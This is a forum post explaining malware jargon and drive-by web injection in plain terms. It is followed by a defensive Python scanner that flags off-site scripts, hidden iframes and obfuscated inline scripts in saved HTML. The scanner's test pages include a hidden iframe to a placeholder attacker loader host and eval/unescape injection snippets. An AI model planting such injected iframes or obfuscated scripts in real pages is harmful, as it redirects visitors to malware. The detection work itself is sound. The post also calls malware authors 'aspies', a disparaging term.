Posted: Sep 30, 2012 10:28 am
by paret0
Ironclad wrote:

I'm thinking I may start using Hijack This! as an extra surprise for anyone trying to insert keyloggers. But I'm not sure this programme would have helped, in this recent case.

Bounce the HJT thing off byo. He's giving out the good stuff here.

Most of that went right over my head, I'm afraid.

"Trojan" - a virus you download as a legit script or program. From the Trojan Horse of The Odyssey. "Beware of Greeks bearing gifts."
"Worm" - malware that can migrate to other places and other computers. Like the Sandworms from Dune, you just never know where they'll pop up.
"Rootkit" or "Persistent Rootkit" - malware that hides itself and seeks elevated privileges to run commands (like to delete things, or to open up a backdoor and upload your bank account info from your browser cache to whoever).
"RAT" - Remote Access Terminal - just like it sounds. Like LogMeIn for the bad guys. Over a special badguy VPN hosted by your computer. Bad.

"Russian Business Network" - Web hosting by the Russian Mob. "Bulletproof", as long as you pay up and don't mind the puns. - Where to host your Nike Viagra spam site or malware loader without the inconvenient hassle of dealing with noncriminals and their pesky little rules about legitimate web hosting.
You exploit a website. "Arbitrary Code Execution" means that website's computer will run any software you load on it. You put a java or php script (series of commands) on that site's home page that makes a visitor's browser go to your illegal RBN server and download a buttload more scripts and run more commands.
Happens every day.

"Segmented network" - A scalable, redundant, distributed high-availability and failover cluster solution for the bad guys, vertically integrated with badguy tech through the edges, cores, and backbones. Engineered for max life cycle and rapid redeployment. Distributed database and middleware scattered over the planet.
For you and your infected computer, it's like Folding@Home, except you didn't volunteer for any of this shit.

Gumblar was special because it could morph itself completely with its next communication with its control net. This greatly prolonged its attack window in the wild because its attack signature, its M.O., varied whenever it sensed the jig was up. Gumblar was not one signature, but hundreds. An inspired piece of criminal code that's still running in labs and "Out there".

The VX Lifestyle:
Nerdy little aspies named Eugen with enough stick time to build a software structure as big and tight as Gumblar are specialists who generally don't have the street smarts to capitalize on it before Interpol kicks in the door. They also generally need partners to protect them and their intellectual products from opportunists who can beat anything they want to know out of just about anyone, with a hammer.
They either live double and triple lives of cloak and dagger, or retire early. Gangsta-style or shot up by lawful authorities. Retired.
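The injection the post describes (a script or hidden iframe dropped onto a compromised site's home page that sends visitors off to the attacker's loader) and the "morphing" point about Gumblar both come down to one practical question: how do you spot the injected code on a page you own when the literal text of it keeps changing? The scanner below is an added example, not code from this thread or from any named product. It parses saved HTML with the standard library, flags script/iframe sources that point off-site, and flags inline scripts that carry several obfuscation markers at once. The sample pages and the hostnames in them (`victim.example`, `rbn-host.example`) are constructed for illustration; the last two samples are two "variants" of the same injection with different literal text, to show why an exact-string signature taken from one misses the other while the structural check catches both.

```python
"""Scan saved HTML for injected redirect scripts and hidden iframes.

Added example; sample pages and hostnames below are constructed, and
'rbn-host.example' is a placeholder for the attacker's loader host.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Structural markers common to obfuscated injected scripts. None is a
# signature on its own; we require several together. The literal text of
# the script can change between variants without changing these traits.
OBFUSCATION_MARKERS = [
    re.compile(r"\beval\s*\("),
    re.compile(r"\bunescape\s*\("),
    re.compile(r"String\.fromCharCode"),
    re.compile(r"document\.write\s*\("),
    re.compile(r"(?:\\x[0-9a-fA-F]{2}|%[0-9a-fA-F]{2}){8,}"),  # long escape runs
]


class InjectScanner(HTMLParser):
    """Collect <script src>, <iframe src> and inline <script> bodies."""

    def __init__(self):
        super().__init__()
        self.external = []      # (tag, src) pairs
        self.inline = []        # inline script bodies
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            self._buf = []
            if a.get("src"):
                self.external.append((tag, a["src"]))
        elif tag == "iframe" and a.get("src"):
            self.external.append((tag, a["src"]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False
            body = "".join(self._buf).strip()
            if body:
                self.inline.append(body)

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def scan_page(html, site_host):
    """Return findings for one page known to be served from site_host."""
    p = InjectScanner()
    p.feed(html)
    findings = []
    for tag, src in p.external:
        host = urlparse(src).hostname
        # Relative and same-site sources are normal; an off-site script or
        # iframe is the redirect hop to the attacker's loader.
        if host and host != site_host and not host.endswith("." + site_host):
            findings.append(("offsite-" + tag, src))
    for body in p.inline:
        hits = [m for m in OBFUSCATION_MARKERS if m.search(body)]
        if len(hits) >= 2:
            findings.append(("obfuscated-inline-script", body[:60]))
    return findings


def exact_signature_match(html, signature):
    """The naive approach: look for one literal string from a known sample."""
    return signature in html


# Constructed sample pages (not captured from any real site).
CLEAN_PAGE = """<html><head><script src="/js/site.js"></script></head>
<body><p>Welcome</p><script>var x = 1; console.log(x);</script></body></html>"""

HIDDEN_IFRAME_PAGE = """<html><body><p>Welcome</p>
<iframe src="http://rbn-host.example/loader.php" width="1" height="1"
 style="visibility:hidden"></iframe></body></html>"""

VARIANT_A = """<html><body><p>Welcome</p>
<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28'))</script>
</body></html>"""

# Same injection, "morphed": different literal text, same structure.
VARIANT_B = """<html><body><p>Welcome</p>
<script>var z=String.fromCharCode(100,111,99);document.write(unescape(
'%3c%69%66%72%61%6d%65%20%73%72%63%3d'));</script></body></html>"""

if __name__ == "__main__":
    sig = "eval(unescape('%64%6f%63"       # signature lifted from VARIANT_A
    for name, page in [("clean", CLEAN_PAGE), ("iframe", HIDDEN_IFRAME_PAGE),
                       ("variant A", VARIANT_A), ("variant B", VARIANT_B)]:
        print(name, "signature:", exact_signature_match(page, sig),
              "structural:", scan_page(page, "victim.example"))
```

Run it against pages pulled from your own web root (or from a crawl of your site) and a finding on a page you did not change is the thing to chase. The check is deliberately loose about literal text, which is the point: the morphing described above defeats the exact-string match but not the off-site-source and multiple-marker tests.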